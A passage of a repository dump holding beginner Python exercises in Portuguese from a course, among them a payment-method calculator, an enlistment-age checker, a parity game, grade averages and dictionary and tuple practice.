"license_type": "no_license",
"max_line_length": 88,
"num_lines": 46,
"path": "/EX 044_Gerenciador_de_Pagamentos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def avista(valor):\n valorAvista = valor - (valor * 10 / 100)\n print(\"Sua compra com pagamento a avista tem um desconto de 10% \")\n print(f\"Sua compra que estava no valor de {valor} vai sair por {valorAvista}\")\ndef Debito(valor):\n debitoAvista = valor - (valor * 5 / 100)\n print(\"Sua compra que com pagamento no Cartão de debito tem um desconto de 5%\")\n print(f\"Sua compra que estava no valor de {valor} vai sair por {debitoAvista}\")\ndef creditoAte2x(valor):\n vezes = int(input(\"Digite em quantas vezes ira parcelar: 1 ou 2 vezes: \"))\n if vezes == 1 or vezes == 2:\n print(\"Não temos desconto para compras parceladas em ate 2 vezes\")\n credito2x = valor / vezes\n print(f\"Sua compra tem uma valor inicial de {valor}\")\n print(f\"Esse valor vai ficar parcelado em {vezes} x {credito2x}\")\n else:\n print(\"Lembramos que para esse opção e permitido apenas dividir em ate 2 vezes\")\n\ndef creditoMaior2x(valor):\n vezes = int(input(\"Digite em quantas vezes ira parcelar: \"))\n valorFinal = valor + (valor * 20 / 100)\n print(\"Para compras dividas acima de 2x temos um juros de 20%\")\n print(f\"Então sua compra que era de {valor} com o juros saira por {valorFinal}\")\n valorParcela = valorFinal / vezes\n print(f\"O valor {valorFinal} divido em {vezes} vezes\") \n print(f\"Ficara em {vezes} x {valorParcela}\")\n\n \nvalorCompra = float(input(\"Digite o valor da sua compra: \"))\nprint(\"-=-\" * 20)\nprint(\"FORMAS DE PAGAMENTO\")\nprint(\"-=-\" * 20)\nprint(\"[ 1 ] a vista dinheiro/cheque\\n\"\n \"[ 2 ] a vista catão debito\\n\"\n \"[ 3 ] 2 x cartão de credito\\n\"\n \"[ 4 ] 3 x ou mais no cartão de credito\\n\")\nopc = int(input(\"Digite a opção de desejada: \"))\n\nif opc == 1:\n avista(valorCompra)\nelif opc == 2:\n Debito(valorCompra)\nelif opc == 3:\n creditoAte2x(valorCompra)\nelif opc == 4:\n creditoMaior2x(valorCompra) \n"
},
{
"alpha_fraction": 0.6832060813903809,
"alphanum_fraction": 0.6870229244232178,
"avg_line_length": 42.33333206176758,
"blob_id": "62b0dcce4fa1f0cfc7b291076a3826298e91b22f",
"content_id": "68f7eb767cc25bf26f6394a51f12e0c29e96d4fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/EX 055_Maior_e_meno_ da_sequência.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "pesos = []\nqtdPesos = int(input(\"Digite o o numero de pesos que deseja adiconar : \"))\nfor c in range(0, qtdPesos):\n pesos.append(float(input(\"Digite o pesos: \")))\nprint(f\"O maior peso encontrado {max(pesos)}\")\nprint(f'O menor peso encontrado {min(pesos)}')\n\n\n"
},
{
"alpha_fraction": 0.6877761483192444,
"alphanum_fraction": 0.6995581984519958,
"avg_line_length": 34.6315803527832,
"blob_id": "6ba8474dd35107ce18d12ccd142055ddc45f10e3",
"content_id": "a09fcdb92c73e9fb4a72a5e40348d667b4cd0f79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 688,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 19,
"path": "/EX 039_Alistamento_Militar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\nanoAtual = date.today().year\n\nanoNascimento = int(input(\"Digite o ano do seu nascimento: \"))\n\nidade = anoAtual - anoNascimento\n\nif idade == 18:\n print(\"Parabens voce esta na idade para se alistar\")\n print(f\"Você ja tem {idade} anos\")\n print(\"Se apresente a junta militar mais proxima de você\")\nelif idade < 18:\n print(\"Você ainda não atingiu a idade adequeda para se alistar\")\n print(f\"Você tem apenas {idade} anos\")\n print(f'Aguarde mais {18 - idade} anos')\nelif idade > 18:\n print('Você esta um pouco atrazado para se alistar')\n print(f\"Você tem {idade} anos\")\n print('Procure a junta militar para resolver sua situação')\n\n\n"
},
{
"alpha_fraction": 0.5511945486068726,
"alphanum_fraction": 0.5554607510566711,
"avg_line_length": 28.9743595123291,
"blob_id": "ad93e78a6812bb59fe0645b33d4058f64c69fe40",
"content_id": "a83bc55b713946d185008812f2968e56964104b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1172,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 39,
"path": "/EX 094_Unindo dicionários e listas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "pessoas = dict()\ncadpessoas = list()\nsoma = media = 0\n\nwhile True:\n pessoas.clear()\n pessoas['nome'] = str(input('Nome : '))\n while True:\n pessoas['Sexo'] = str(input('Sexo: ')).upper()[0]\n if pessoas['Sexo'] in \"MF\":\n break\n print(\" Por favor, Responda apenas M ou F\")\n pessoas['idade'] = int(input('Idade: '))\n soma += pessoas['idade']\n cadpessoas.append(pessoas.copy())\n while True:\n resp = str(input('Quer Continuar ? [S/N]')).upper()[0]\n if resp in 'SN':\n break\n print(\"ERRO!, Responda apenas S ou N\")\n if resp == 'N':\n break\nprint(f'A o todo tesmo {len(cadpessoas)} pessoas cadastrasdas')\nmedia = soma / len(cadpessoas)\nprint(f'A media de idade e de {media:5.2f} anos')\nprint(f'A soma das idade e {soma}')\nprint(f'As muleres cadastradas foram', end=' ')\nfor p in cadpessoas:\n if p['Sexo'] in 'Ff':\n print(f'{p[\"nome\"]}', end=' ')\nprint()\nprint('Lista de pessoas acima da media')\nfor p in cadpessoas:\n if p['idade'] >= media:\n print(' ')\n for k, v in p.items():\n print(f'{k} = {v}:', end=' ')\n print()\nprint('ENCERRADO')\n\n\n\n"
},
{
"alpha_fraction": 0.4786127209663391,
"alphanum_fraction": 0.49364161491394043,
"avg_line_length": 29.428571701049805,
"blob_id": "bb107cf49f2f7cafb3dc61dd9914ddfcc03f67bd",
"content_id": "4a6d9557bc746f838488e7973dc0194397f69546",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 865,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 28,
"path": "/EX 068_ Jogo_do_Par_ou_Ímpar.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nv = 0\nwhile True:\n jogador = int(input(\"Digite seu numero: \"))\n computador = randint(0,10)\n total = computador + jogador\n tipo = \" \"\n while tipo not in \"PI\":\n tipo = str(input(\"Escolha par = [ P ] ou impar = [ I ]: \")).strip().upper()[0]\n print(f\"Voce jogou {jogador} o computador {computador} o total e {total}\", end = \" \")\n print('DEU PAR' if total % 2 == 0 else 'DEU IMPAR')\n if tipo == \"P\":\n if total % 2 == 0:\n print(\"VOCE VENCEU\")\n v += 1\n else:\n print(\"VOCE PERDEU\")\n break\n\n elif tipo == \"I\":\n if total % 2 == 1:\n print(\"VOCE VENCEU\")\n v += 1\n else:\n print(\"VOCE PERDEU\")\n break\n print(\"Vamor jogar Novamente...\")\nprint(f\"GAME OVER VOCE JOGOU {v} VEZES\")\n \n"
},
{
"alpha_fraction": 0.6143791079521179,
"alphanum_fraction": 0.6274510025978088,
"avg_line_length": 29.5,
"blob_id": "447b2ac66217f2f2058a901d3469d89d76a471ea",
"content_id": "95dbf6fe44a15e7fc7801ff4a1f1bd6a2da10ddf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/EX 040_Aquele_clássico_da_Média.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "qtd = int(input('Digite quantas notas voce deseja adicionar: '))\nnota = []\nnum = 1\nfor c in range(0, qtd):\n nota.append(float(input(f\"Digite a sua nota {c + 1} nota: \")))\nfor item in nota:\n print(f'{num}º nota e {item}')\n num += 1\nmedia = sum(nota) / qtd\nprint(f\"A media dessas notas e {media}\")\n\n"
},
{
"alpha_fraction": 0.5812183022499084,
"alphanum_fraction": 0.6015228629112244,
"avg_line_length": 29.30769157409668,
"blob_id": "9cf576754fe270cc11f635230ad6822bdadacb43",
"content_id": "a27f35c171846eaea5a823e975aa90efa690b2b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 13,
"path": "/EX 101_Funções para votação.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def voto(ano):\n from datetime import date\n anoatual = date.today().year\n idade = anoatual - ano\n if idade < 16:\n return f'Com {idade} anos: Não vota: '\n elif 16 <= idade < 18 or idade > 65:\n return f'Com {idade} anos: Não Opcional: '\n else:\n return f'Com {idade} anos: Voto Obrigatorio'\n\nnasc = int(input('Em que ano voce nasceu: '))\nprint(voto(nasc))\n"
},
{
"alpha_fraction": 0.4849785268306732,
"alphanum_fraction": 0.5193132758140564,
"avg_line_length": 27.75,
"blob_id": "50b4c2f479f0239788c71febb3f741f0db07a06c",
"content_id": "5089e3f1c5db3af70659d766cd671d3a6e080d13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 8,
"path": "/EX 067_Tabuada_v3.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "while True:\n tabuada = int(input(\"Qual numero voce deseja ver a tabuada ?\"))\n if tabuada < 0:\n break\n print(\"-\" * 30)\n for c in range(1,11):\n print(f'{tabuada} X {c} = {tabuada * c}')\n print(\"-\" * 30)\n\n\n\n"
},
{
"alpha_fraction": 0.6898396015167236,
"alphanum_fraction": 0.6951871514320374,
"avg_line_length": 52.42856979370117,
"blob_id": "18442d134ab4e4959eb136a346e19bdf2f4219df",
"content_id": "9077d6e62989296263e7b21be6c61998e516f3e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 7,
"path": "/EX 022_Analisador_de_texto.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "nome = str(input(\"Digite seu nome: \")).strip()\nprint(\"Analisando nome\")\nprint(f\"O nome com todas as letras maiusculas e {nome.upper()}\")\nprint(f\"O nome com todas as letras minusculas e {nome.lower()}\")\nprint(f\"Seu nome tem ao todo {len(nome)-nome.count(' ')}\")\nsepara_nome = nome.split()\nprint(f\"Seu primeiro nome e {separa_nome[0]} e ele tem {len(separa_nome[0])} letras\")\n"
},
{
"alpha_fraction": 0.6239316463470459,
"alphanum_fraction": 0.6581196784973145,
"avg_line_length": 28.25,
"blob_id": "152792b750d40e5d1833b75b52ec4d0ee7e34a73",
"content_id": "2b231f451e86719f723ff354a5cdf91098cf310b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 234,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 8,
"path": "/EX 019_Sorteando_um_item_na_lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import choice\nalunos = []\na1 = input('primeiro aluno: ')\na2 = input('segundo aluno: ')\na3 = input('teceiro aluno: ')\na4 = input('quarto aluno: ')\nalunos = [a1, a2, a3, a4]\nprint(f'o aluno escolhido foi {choice(alunos)} ')\n"
},
{
"alpha_fraction": 0.5686274766921997,
"alphanum_fraction": 0.6176470518112183,
"avg_line_length": 16.16666603088379,
"blob_id": "b18c2300e44f9aaaf286d150d69cc78eef850c5a",
"content_id": "801733662391714a02d63ca16285d6f6bb3c3bd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 102,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 6,
"path": "/EX 046_Contagem_regressiva.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from time import sleep\n\nfor c in range(10, -1, -1):\n print(c)\n sleep(1)\nprint(\"BOW BOW BOW BOW\")"
},
{
"alpha_fraction": 0.6283891797065735,
"alphanum_fraction": 0.6475279331207275,
"avg_line_length": 47.230770111083984,
"blob_id": "d26de1840a891ff7416eea521bcfe08ab04a00e5",
"content_id": "23241910f1234926fba5b32c56ead8637b1b2c2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 641,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 13,
"path": "/EX 073 _0_Tuplas_com_Times _de_Futebol.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "times = ('Flamengo', 'Internacional', 'Atlético Mineiro', 'São Paulo', 'Fluminense', 'Grêmio', 'Palmeiras', 'Santos'\n , 'Atlético Paranaense', 'Bragantino', 'Ceará', 'Corinthians', 'Atlético Goianiense', 'Bahia', 'Sport',\n 'Fortaleza', 'Vasco da Gama', 'Goiás', 'Coritiba', 'Botafogo')\n\nprint(f\"Lista de times Braileirao: {times}\")\nprint('X' * 25)\nprint(f'Os 5 primeiros são {times[0:5]}')\nprint('X' * 25)\nprint(f'Os ultimos 4 são {times[-4:]}')\nprint('Os times em ordem alfabetica:')\nprint(f'{sorted(times)}', end=\" \")\nprint('X' * 25)\nprint(f'O coritiba esa na posição {times.index(\"Coritiba\") + 1}ª posição')\n"
},
{
"alpha_fraction": 0.671999990940094,
"alphanum_fraction": 0.671999990940094,
"avg_line_length": 21.81818199157715,
"blob_id": "56ec12b80d541d1b19c38ac371723dd9a1937e8a",
"content_id": "acc7d65d69d5181ed7fafeb45cf5a815a7b0d419",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 11,
"path": "/EX 097_Um print especial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def tamanhofrase (frase):\n print('~' * len(frase))\n print(frase)\n print('~' * len(frase))\n\ntamanhofrase('Voce e muito doido')\ntamanhofrase('VEC')\ntamanhofrase('Queria ter sorte')\n\nfra = str(input(\"Dite a frase desejada: \"))\ntamanhofrase(fra)"
},
{
"alpha_fraction": 0.63456791639328,
"alphanum_fraction": 0.6567901372909546,
"avg_line_length": 25.733333587646484,
"blob_id": "9f3ac3c87a1bb3967e196f862ff4e83f79e76dd4",
"content_id": "2e49c82a357d5846850c22c1769d2f0f59ca62c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 406,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 15,
"path": "/EX 028_Jogo_adivinhação_V1.0.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import randint\nfrom time import sleep\n\n\npc = randint(0, 5)\nprint(\"-=-\" * 20)\nprint(\"Vou pensar em um numero entre 0 e 5. Tente adivinhar\")\nprint(\"-=-\" * 20)\njogador = int(input(\"Em que numero eu pensei ? \"))\nprint(\"PROCESSANDO....\")\nsleep(3)\nif pc == jogador:\n print(\"Parabens você acertou\")\nelif pc != jogador:\n print(f\"Ganhei ! eu pensei no numero {pc} e nao no numero {jogador}\")\n\n\n\n\n"
},
{
"alpha_fraction": 0.7429906725883484,
"alphanum_fraction": 0.7476635575294495,
"avg_line_length": 42,
"blob_id": "050f8307ca8511e00678d7b437c2ac8d6c0e4636",
"content_id": "d92d960ea06279b88932bf78dd21b8d7cc3714d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 5,
"path": "/EX 015_Aluguel_de_Carros.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "import math\ncatetooposto = float(input('digite o cateto oposto: '))\ncatetoadjacente = float(input('digite o cateto adjacete: '))\nhi = math.hypot(catetooposto, catetoadjacente)\nprint(f'a sua hipotenuza e {hi:.2f} ')"
},
{
"alpha_fraction": 0.5815602540969849,
"alphanum_fraction": 0.5921986103057861,
"avg_line_length": 13.8421049118042,
"blob_id": "0607229e8e2cca0ae85c507e497df59170ad1b5a",
"content_id": "0fa910e2295bcf7d6323139bc4c0391a7e89b4a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 282,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 19,
"path": "/EX 006_Drobro_Triplo_raizQuadrada.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from math import sqrt\n\n\ndef dobro():\n print(f'O dobro do numero {num} e {num * 2}')\n\n\ndef triplo():\n print(f'O triplo de {num} e {num * 3}')\n\ndef raiz():\n print(f'A raiz quadrada de {num} e {sqrt(num):.2f}')\n\n\nnum = int(input('Digite um numero:'))\n\ndobro()\ntriplo()\nraiz()\n"
},
{
"alpha_fraction": 0.6106194853782654,
"alphanum_fraction": 0.6283186078071594,
"avg_line_length": 27.25,
"blob_id": "06abbb600a8fa5d25273f2bdaff9dcd23c0abe66",
"content_id": "0e760bb965ba282427c1290a10ab78703ba044e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 565,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 20,
"path": "/EX 054_Grupo_da_Maioridade.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from datetime import date\nanoAtual = date.today().year\n\nnumPessoas = int(input(\"Quantas datas voce deseja adicionar ? \"))\npessoas = []\nfor c in range (0, numPessoas):\n contmaior = 0\n contmenor = 0\n pessoas.append(int(input((f'Em que ano a {c+1} pessoa nasceu ?'))))\n for data in pessoas:\n idade = anoAtual - data\n if idade <= 17:\n contmenor += 1\n elif idade > 17:\n contmaior += 1\nprint(pessoas)\nprint(f\"\"\"\nNo total temos {contmaior} pessoas maires de idade\\n\ne temos {contmenor} pessoas menores de idade\n\"\"\")\n"
},
{
"alpha_fraction": 0.6693548560142517,
"alphanum_fraction": 0.6693548560142517,
"avg_line_length": 30,
"blob_id": "03acc76cc7eecb05649381a7cc73b641897ca1ea",
"content_id": "01cc69aa90ff5ebf918743c248318004afc4da15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 12,
"path": "/EX 065_ Maior e_Menor_valores.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "lista = list()\nopc ='Ss'\n\nwhile opc in \"Ss\":\n lista.append(float(input(\"Digite um numero: \")))\n opc = str(input(\"Quer continuar[S/N]: \"))\n\nprint(f\"\"\"A soma dos numero digitado e {sum(lista)}\nVoce digitou {len(lista)} numeros\nO menor numero digitado e {min(lista)}\nO maior numero digitado e {max(lista)}\nA media dos numero digitados e {sum(lista) / len(lista)}\"\"\")\n"
},
{
"alpha_fraction": 0.5923423171043396,
"alphanum_fraction": 0.6126126050949097,
"avg_line_length": 39.3636360168457,
"blob_id": "77e5435573e244e3c8d17a530bcaa165f8a7a8fc",
"content_id": "48befd260208258138ac60a3464fe05f1c108e03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 446,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 11,
"path": "/EX 075 _ Análise_de_dados_em_uma_Tupla.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "num = (int(input(\"Digite um numero: \")), int(input(\"Digite um numero: \")), int(input(\"Digite um numero: \")),\n int(input(\"Digite um numero: \")))\nprint(f'Voce digitou {num}')\nprint(f'O valor 9 apareceu{num.count(9)} vez')\nif 3 in num:\n print(f'O valor 3 parece na {num.index(3) + 1}')\nelse:\n print(\"O valor 3 nao apareceu em nenhuma posição\")\nfor n in num:\n if n % 2 == 0:\n print(f'O numeros pares digitados :{n}', end=\" \")\n"
},
{
"alpha_fraction": 0.6748466491699219,
"alphanum_fraction": 0.7177914381027222,
"avg_line_length": 53.66666793823242,
"blob_id": "ce12ebc76712a130208a7adb22c1764adea6e290",
"content_id": "c3d177c6a6b95e625030987a0f59bc3fc578770b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 3,
"path": "/EX 013_Reajuste_Salarial.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "salario = float(input('qual o salario atual do funcionario? '))\nnovosalario = salario + (salario * 15 / 100)\nprint(f'o salario com 15% de aumento e {novosalario}')"
},
{
"alpha_fraction": 0.48880597949028015,
"alphanum_fraction": 0.5373134613037109,
"avg_line_length": 20.399999618530273,
"blob_id": "a571f74162a5f296c890164b1a4d4e24cd1a97aa",
"content_id": "90d9ca6eb925093a7512e575a20d934ba8734aaa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 25,
"path": "/EX 099_Função que descobre o maior.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from time import sleep\n\ndef maior(*num):\n cont = maior = 0\n print('\\nanalisando os valores passados...\\n')\n for valor in num:\n print(f'{valor}', end=' ', flush=True)\n sleep(0.3)\n if cont == 0:\n maior = valor\n else:\n if valor > maior:\n maior = valor\n cont += 1\n print(f'\\nforam imformado {cont} valores')\n print(f'\\no maior valor informado for {maior}')\n\n\nmaior(8,5,6,9,1,2)\nmaior(7,6,3,4,5)\nmaior(8,2,1,3,)\nmaior(1,2,4)\nmaior(3,5)\nmaior(9)\nmaior()\n\n"
},
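The `maior(*num)` routine in the entry above relies on Python's varargs packing; a minimal sketch of the same pattern (illustrative names, not from the repository):

    def largest(*values):
        # *values packs every positional argument into one tuple
        best = None
        for v in values:
            if best is None or v > best:
                best = v
        return best

    print(largest(8, 5, 6, 9, 1, 2))  # -> 9
    print(largest())                  # -> None; an empty call is still valid
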
{
"alpha_fraction": 0.5137740969657898,
"alphanum_fraction": 0.557851254940033,
"avg_line_length": 20.352941513061523,
"blob_id": "ccaf2d9e3dae90a785c74c83c50ac73b1e8bc300",
"content_id": "d0f06facf246247276f710bb1522d01ae3f62ea5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 732,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 34,
"path": "/EX 003_Somando_dois_numeros .py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def soma():\n print(f'A soma de {num1} + {num2} = {num1 + num2}')\n\n\ndef subtracao():\n print(f'A soma de {num1} - {num2} = {num1 - num2}')\n\n\ndef divisao():\n print(f'A soma de {num1} / {num2} = {num1 / num2}')\n\n\ndef multiplicacao():\n print(f'A soma de {num1} X {num2} = {num1 * num2}')\n\n\nnum1 = float(input(\"Digite o primeiro numero: \"))\nnum2 = float(input(\"Digite o segundo numero: \"))\nprint(\"*X\" * 16)\nprint(\"X*\" * 5, \"OPERADORES\", \"*X\" * 5)\nprint(\"*X\" * 16)\nprint('(1) soma\\n'\n '(2) subtração\\n'\n '(3) divisão\\n'\n '(4) Multiplicação\\n')\nopcao = int(input('Qual opcão ?'))\nif opcao == 1:\n soma()\nelif opcao == 2:\n subtracao()\nelif opcao == 3:\n divisao()\nelif opcao == 4:\n multiplicacao()\n"
},
{
"alpha_fraction": 0.6813187003135681,
"alphanum_fraction": 0.7069597244262695,
"avg_line_length": 21.83333396911621,
"blob_id": "6e8ff2756d486976e7c05a85679477dca4cfd687",
"content_id": "6bcd45a7138263f18f886874561976467036f1f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 12,
"path": "/EX 008_Coversor_de_medidas.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def centimetros():\n print(f'{metro}m convertido para centrimetros e {metro * 100}c')\n\n\ndef milimetros():\n print(f'{metro}m convertido para milimetros e {metro * 1000}m ')\n\n\nmetro = float(input(\"Digite quantos metros vc deseja converte: \"))\n\ncentimetros()\nmilimetros()"
},
{
"alpha_fraction": 0.4976303279399872,
"alphanum_fraction": 0.5165876746177673,
"avg_line_length": 25.375,
"blob_id": "39869b5ea3fab65be87578dae6f11702aecfacbc",
"content_id": "b994d7cb01be879b7f7e8492898fd1c5aef6143e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 642,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 24,
"path": "/EX 105_Analisando e gerando Dicionários.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "def notas(*n, sit=False):\n \"\"\"\n ->Função para analisar uma o mais notas de alunos\n :param n: uma o mais notas de alunos\n :param sit: valor opcional se deve ou nao adicionar\n :return:retorna uma dicinario com as informaçoes\n \"\"\"\n r = dict()\n r['total'] = len(n)\n r['maior'] = max(n)\n r['menor'] = min(n)\n r['media'] = sum(n) / len(n)\n if sit:\n if r['media'] >= 7:\n r['situação'] = 'BOA'\n elif r['media'] >= 5:\n r['situação'] = 'RAZOAVEL'\n else:\n r['situação'] = 'RUIM'\n return r\n\n\nresp = notas(8.0, 5.0, 9.0, 6.0, 8.4, sit=True)\nprint(resp)\n"
},
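The `notas` helper in the entry above returns a plain dict; a short usage sketch (grade values are illustrative, not from the repository):

    resultado = notas(8.0, 5.0, 9.0, 6.0, 8.4, sit=True)
    # media = 36.4 / 5 = 7.28, so 'situação' comes back as 'BOA'
    for chave, valor in resultado.items():
        print(f'{chave}: {valor}')
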
{
"alpha_fraction": 0.582524299621582,
"alphanum_fraction": 0.6407766938209534,
"avg_line_length": 24.875,
"blob_id": "d67c4183028a0a27e4b432f8d36d29d5dc329fec",
"content_id": "a116d3e6a31f15ef263e25c90f43de7a4ee2edf3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 210,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 8,
"path": "/EX 020_Sorteando_uma_ordem _na_lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "from random import shuffle\na1 = input('1ª aluno: ')\na2 = input('2ª aluno: ')\na3 = input('3º aluno: ')\na4 = input('4º aluno: ')\nlista = [a1, a2, a3, a4]\nshuffle(lista)\nprint(f'o aluno sorteado foi: {lista}')"
},
{
"alpha_fraction": 0.7452830076217651,
"alphanum_fraction": 0.7735849022865295,
"avg_line_length": 34.66666793823242,
"blob_id": "429ecb104e14d5d01d09b076fffee57a90b781f4",
"content_id": "27d36c767febedcc9284ca5dccd8bc09ba6084f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/README.md",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "# Exercicios passados no Curso em video.\n# Ministrados Pelo professor Guanabara.\n# Mundo 1 2 e 3 de python"
},
{
"alpha_fraction": 0.6013667583465576,
"alphanum_fraction": 0.6059225797653198,
"avg_line_length": 32.61538314819336,
"blob_id": "bbc20ad9ae85aee24570ba93edcf2520777f3611",
"content_id": "d9c03bbc2fef71d92c3a91c46d207879edaa4691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 13,
"path": "/EX 078_Maior_e_Menor_valores_na_Lista.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "listanum = []\n\nfor c in range(0,5):\n listanum.append(int(input(f'Digite um numero na posição {c}: ')))\n\nprint(f\"O maior numero digitado foi: {max(listanum)} nas posiçôes: \", end = '')\nfor i, v in enumerate(listanum):\n if v == max(listanum):\n print(f'{i}....')\nprint(f'O menor nuemro digitado foi: {min(listanum)} nas posições: ', end='')\nfor i, v in enumerate(listanum):\n if v == min(listanum):\n print(f'{i}....')\n\n\n"
},
{
"alpha_fraction": 0.538226306438446,
"alphanum_fraction": 0.5642201900482178,
"avg_line_length": 25.15999984741211,
"blob_id": "0da6c41215a118ae607ea28eede929a0f9418d8d",
"content_id": "d5e01ff8d2e2ca9d46ad8d5dfe2f5debd785650f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 654,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 25,
"path": "/EX 070_Estatísticas_em_produtos.py",
"repo_name": "TassioSales/PythonMundo1",
"src_encoding": "UTF-8",
"text": "total= totmil = menor = cont= 0\nbarato= \" \"\n\nwhile True:\n produto = str(input(\"nome do produto: \"))\n preco = float(input(\"preco R$ \"))\n cont += 1\n total += preco\n if preco > 1000:\n totmil += 1\n if cont == 1 or preco < menor:\n menor = preco\n barato == produto\n \n resp = \" \"\n\n while resp not in \"SN\":\n resp = str(input(\"Quer continuar ? [S/N]\")).strip().upper()[0]\n if resp == \"N\":\n break\n\nprint(\"{:^40}\".format(\"FIM DO PROGRAMA\"))\nprint(f\"O total da compra foi {total:.2f}\")\nprint(f'voce comprou {totmil} produtos acima de 1000 reais')\nprint(f\"o produto mais barato custa {menor:.2f}\")\n"
},
{
"alpha_fraction": 0.700507640838623,
"alphanum_fraction": 0.700507640838623,
"avg_line_length": 65,
